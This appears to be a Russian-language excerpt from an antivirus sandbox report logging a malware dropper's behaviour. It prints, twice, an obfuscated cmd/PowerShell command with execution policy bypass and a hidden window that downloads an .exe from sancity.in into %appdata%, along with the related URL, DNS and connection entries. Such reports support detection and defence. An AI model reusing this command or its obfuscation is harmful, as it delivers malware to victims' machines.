Техническая информация
- http://sancity.in/accountrnsc/head/xm4lqyvu/myposkdp.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "po^W^ERsH^eLL^.eXe -^ExE^CUTi^ONp^ol^i^c^y byPaSS^ -nO^P^r^o^F^ilE^ -WINdoWST^YLe HiD^dE^N (NEw-^Ob^jEc^T ^sYSTEm.^NeT.webc^L^i^ENt).DO^wnL^OaDFI^le('http://sancity.in/account...
- 'sa##ity.in':80
- http://sa##ity.in/accountrnsc/head/xM4lQyVu/MyposkDP.exe
- DNS ASK sa##ity.in
- '<SYSTEM32>\cmd.exe' /C "po^W^ERsH^eLL^.eXe -^ExE^CUTi^ONp^ol^i^c^y byPaSS^ -nO^P^r^o^F^ilE^ -WINdoWST^YLe HiD^dE^N (NEw-^Ob^jEc^T ^sYSTEm.^NeT.webc^L^i^ENt).DO^wnL^OaDFI^le('http://sancity.in/account...' (со скрытым окном)